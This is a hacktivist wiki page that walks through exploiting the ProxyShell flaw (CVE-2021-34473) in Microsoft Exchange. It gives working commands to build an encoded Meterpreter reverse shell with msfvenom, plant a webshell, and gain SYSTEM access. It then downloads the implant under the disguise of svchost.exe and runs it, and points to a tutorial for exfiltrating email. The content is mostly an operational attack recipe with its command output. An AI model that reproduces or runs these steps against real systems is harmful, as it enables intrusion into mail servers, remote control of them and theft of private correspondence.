From Enlace Hacktivista
Jump to navigation Jump to search

Exploiting proxyshell - CVE-2021-34473

  • (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition

I found that using exploit/windows/http/exchange_proxyshell_rce doesn't work but proxyshell-auto does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts.

Build meterpreter

First we make an implant to perform post exploitation using metasploit:

msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe

Now we set our listener:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 8888

Host meterpreter for download:

python3 -m http.server
Serving HTTP on port 8000 ( ...

Gain a shell

We first use proxyshell-auto exploit which will give us a shell if the exchange server has powershell enabled.

Gain a shell:

user@host:~$ python3 proxyshell-auto/ -t
fqdn srvexchange2016.domain.local
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator
leak_sid S-1-5-21-654894352-2732664023-2722231124-500
set_ews Success with subject grvshwaveotkomvc
write webshell at aspnet_client/yhuzv.asPx
<Response [404]>
nt authority\system

From here we want to download a meterpreter payload for post exploitation:

SHELL> powershell.exe Invoke-WebRequest -Uri "" -OutFile "c:\Windows\Temp\svchost.exe"

We now set our listener and execute the payload:

SHELL> powershell.exe "c:\windows\Temp\svchost.exe"

From here we will have a meterpreter connection to work from :)

[*] Started HTTPS reverse handler on
[*] handling request from; (UUID: qdghnakk) Staging x86 payload (176732 bytes) ...
[*] Meterpreter session 1 opened ( -> at 2023-07-05 08:00:18 +0000
meterpreter > sysinfo
Computer        : srvexchange2016
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DOMAIN
Logged On Users : 6
Meterpreter     : x86/windows

E-mail exfiltration

For exfiltrating e-mails via proxyshell exploitation see Guacamaya's tutorial HackBack video.